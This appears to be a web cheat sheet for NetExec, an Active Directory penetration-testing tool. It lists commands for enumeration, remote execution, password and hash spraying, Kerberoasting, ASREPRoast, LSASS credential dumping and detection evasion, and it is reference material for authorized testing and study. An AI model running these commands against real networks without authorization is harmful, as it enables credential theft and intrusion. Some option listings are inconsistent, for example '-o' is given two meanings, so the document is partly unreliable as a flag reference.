コンテンツにスキップ

NetExec

NetExec (formerly CrackMapExec) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks through network protocol abuse and credential attacks.

Installation & Setup

Command Description
pip3 install netexec Install NetExec via pip
pipx install netexec Install with pipx (recommended)
git clone https://github.com/Pennyw0rth/NetExec.git Clone from GitHub
cd NetExec && pip3 install . Install from source
netexec --version Check installed version
netexec --help Display help information

Basic Usage

Command Description
netexec smb 192.168.1.0/24 Scan SMB on subnet
netexec smb 192.168.1.100 -u username -p password Authenticate with credentials
netexec smb 192.168.1.100 -u username -H ntlmhash Authenticate with NTLM hash
netexec smb 192.168.1.100 -u '' -p '' Anonymous authentication
netexec smb targets.txt -u username -p password Use target file

Protocol Support

SMB Protocol

Command Description
netexec smb 192.168.1.100 Basic SMB enumeration
netexec smb 192.168.1.100 --shares Enumerate shares
netexec smb 192.168.1.100 --users Enumerate users
netexec smb 192.168.1.100 --groups Enumerate groups
netexec smb 192.168.1.100 --local-groups Enumerate local groups
netexec smb 192.168.1.100 --sessions Enumerate sessions
netexec smb 192.168.1.100 --disks Enumerate disks

WinRM Protocol

Command Description
netexec winrm 192.168.1.100 -u username -p password WinRM authentication
netexec winrm 192.168.1.100 -u username -p password -x "whoami" Execute command
netexec winrm 192.168.1.100 -u username -p password -X powershell.ps1 Execute PowerShell script

LDAP Protocol

Command Description
netexec ldap 192.168.1.100 -u username -p password LDAP authentication
netexec ldap 192.168.1.100 -u username -p password --users Enumerate LDAP users
netexec ldap 192.168.1.100 -u username -p password --groups Enumerate LDAP groups
netexec ldap 192.168.1.100 -u username -p password --computers Enumerate computers

MSSQL Protocol

Command Description
netexec mssql 192.168.1.100 -u username -p password MSSQL authentication
netexec mssql 192.168.1.100 -u username -p password -q "SELECT @@version" Execute SQL query
netexec mssql 192.168.1.100 -u username -p password --local-auth Local authentication

SSH Protocol

Command Description
netexec ssh 192.168.1.100 -u username -p password SSH authentication
netexec ssh 192.168.1.100 -u username -k id_rsa SSH key authentication
netexec ssh 192.168.1.100 -u username -p password -x "id" Execute command

Authentication Methods

Password Authentication

Command Description
netexec smb 192.168.1.100 -u username -p password Single credential
netexec smb 192.168.1.100 -u users.txt -p passwords.txt Credential lists
netexec smb 192.168.1.100 -u username -p passwords.txt Password spraying
netexec smb 192.168.1.100 -u users.txt -p password User enumeration

Hash Authentication

Command Description
netexec smb 192.168.1.100 -u username -H ntlmhash NTLM hash
netexec smb 192.168.1.100 -u username -H lmhash:ntlmhash LM:NTLM hash
netexec smb 192.168.1.100 -u users.txt -H hashes.txt Hash lists

Kerberos Authentication

Command Description
netexec smb 192.168.1.100 -u username -p password -k Kerberos authentication
netexec smb 192.168.1.100 -u username --use-kcache Use Kerberos cache
netexec smb 192.168.1.100 -u username -p password --kerberos Force Kerberos

Enumeration

Share Enumeration

Command Description
netexec smb 192.168.1.100 --shares List shares
netexec smb 192.168.1.100 --shares -u username -p password Authenticated share listing
netexec smb 192.168.1.100 --spider SHARE Spider share contents
netexec smb 192.168.1.100 --spider SHARE --pattern "*.txt" Search for files

User Enumeration

Command Description
netexec smb 192.168.1.100 --users Enumerate users
netexec smb 192.168.1.100 --rid-brute RID bruteforce
netexec smb 192.168.1.100 --users --rid-brute 1000-2000 RID range

Group Enumeration

Command Description
netexec smb 192.168.1.100 --groups Enumerate groups
netexec smb 192.168.1.100 --local-groups Local groups
netexec smb 192.168.1.100 --groups "Domain Admins" Specific group

Computer Enumeration

Command Description
netexec ldap 192.168.1.100 --computers Enumerate computers
netexec smb 192.168.1.100 --computers SMB computer enumeration

Command Execution

SMB Command Execution

Command Description
netexec smb 192.168.1.100 -u username -p password -x "whoami" Execute command
netexec smb 192.168.1.100 -u username -p password -X script.ps1 Execute PowerShell script
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec Use WMI execution
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec Use SMB execution

WinRM Command Execution

Command Description
netexec winrm 192.168.1.100 -u username -p password -x "Get-Process" PowerShell command
netexec winrm 192.168.1.100 -u username -p password -X script.ps1 Execute script

Modules

Built-in Modules

Command Description
netexec smb 192.168.1.100 -M spider_plus Enhanced spidering
netexec smb 192.168.1.100 -M enum_avproducts Enumerate AV products
netexec smb 192.168.1.100 -M gpp_password Group Policy Preferences
netexec smb 192.168.1.100 -M lsassy LSASS dumping
netexec smb 192.168.1.100 -M mimikatz Mimikatz execution

Module Options

Command Description
netexec smb 192.168.1.100 -M spider_plus -o READ_ONLY=false Module options
netexec smb 192.168.1.100 -M lsassy -o BLOODHOUND=true Bloodhound output

Database Operations

Command Description
netexec smb 192.168.1.100 --users --export users.csv Export to CSV
netexec db Database management
netexec db --workspace default Set workspace
netexec db --clear-database Clear database

Advanced Features

Credential Stuffing

Command Description
netexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success Continue on success
netexec smb targets.txt -u users.txt -p passwords.txt --fail-limit 3 Fail limit

Password Policy

Command Description
netexec smb 192.168.1.100 --pass-pol Get password policy
netexec ldap 192.168.1.100 --pass-pol LDAP password policy

Bloodhound Integration

Command Description
netexec ldap 192.168.1.100 -u username -p password --bloodhound Collect Bloodhound data
netexec ldap 192.168.1.100 -u username -p password --bloodhound -c All All collections

ASREPRoast

Command Description
netexec ldap 192.168.1.100 -u users.txt --asreproast asrep.txt ASREPRoast attack
netexec ldap 192.168.1.100 -u username -p password --asreproast asrep.txt Authenticated ASREPRoast

Kerberoasting

Command Description
netexec ldap 192.168.1.100 -u username -p password --kerberoasting kerb.txt Kerberoasting attack

Output and Logging

Command Description
netexec smb 192.168.1.100 --verbose Verbose output
netexec smb 192.168.1.100 --debug Debug output
netexec smb 192.168.1.100 -o output.txt Save output to file
netexec smb 192.168.1.100 --log logs/ Log directory

Configuration

Config File (~/.nxc/nxc.conf)

[nxc]
workspace = default
last_used_db = ~/.nxc/workspaces/default/nxc.db
pwn3d_label = Pwn3d!
audit_mode = False
reveal_chars_of_pwd = 0

Protocol-specific Options

Command Description
netexec smb 192.168.1.100 --port 445 Custom port
netexec smb 192.168.1.100 --timeout 5 Connection timeout
netexec smb 192.168.1.100 --threads 100 Thread count

Evasion Techniques

Command Description
netexec smb 192.168.1.100 --jitter 1-5 Random delay
netexec smb 192.168.1.100 --delay 2 Fixed delay
netexec smb 192.168.1.100 --obfs Obfuscation

Common Attack Scenarios

Domain Enumeration

# Basic domain enumeration
netexec smb dc.domain.com -u username -p password --users --groups --computers

# Share enumeration
netexec smb 192.168.1.0/24 -u username -p password --shares

# Password policy
netexec smb dc.domain.com -u username -p password --pass-pol

Credential Attacks

# Password spraying
netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success

# Hash spraying
netexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76

# ASREPRoast
netexec ldap dc.domain.com -u users.txt --asreproast asrep_hashes.txt

Post-Exploitation

# Command execution
netexec smb 192.168.1.100 -u username -p password -x "net user /domain"

# LSASS dumping
netexec smb 192.168.1.100 -u username -p password -M lsassy

# Bloodhound collection
netexec ldap dc.domain.com -u username -p password --bloodhound -c All

Integration with Other Tools

Impacket Integration

Command Description
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec Use Impacket WMI
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec Use Impacket SMB

Crackmapexec Migration

Command Description
netexec --convert-cme-db Convert CME database
alias cme='netexec' Create alias for compatibility

Troubleshooting

Command Description
netexec --help General help
netexec smb --help Protocol-specific help
netexec -v Version information
netexec --debug smb 192.168.1.100 Debug mode

Best Practices

  • Use authentication before enumeration when possible
  • Implement proper delays to avoid detection
  • Use workspaces to organize different engagements
  • Export results for further analysis
  • Combine with other tools for comprehensive assessment
  • Monitor for defensive responses
  • Use appropriate thread counts to avoid overwhelming targets
  • Implement proper logging for documentation
  • Validate credentials before large-scale attacks
  • Use obfuscation techniques when necessary

Security Considerations

  • Only use on authorized networks
  • Implement proper access controls
  • Monitor for detection by security tools
  • Use least privilege principles
  • Document all activities for compliance
  • Coordinate with blue team when applicable
  • Implement proper cleanup procedures
  • Store credentials securely
  • Use encrypted communication when possible
  • Regular updates to maintain effectiveness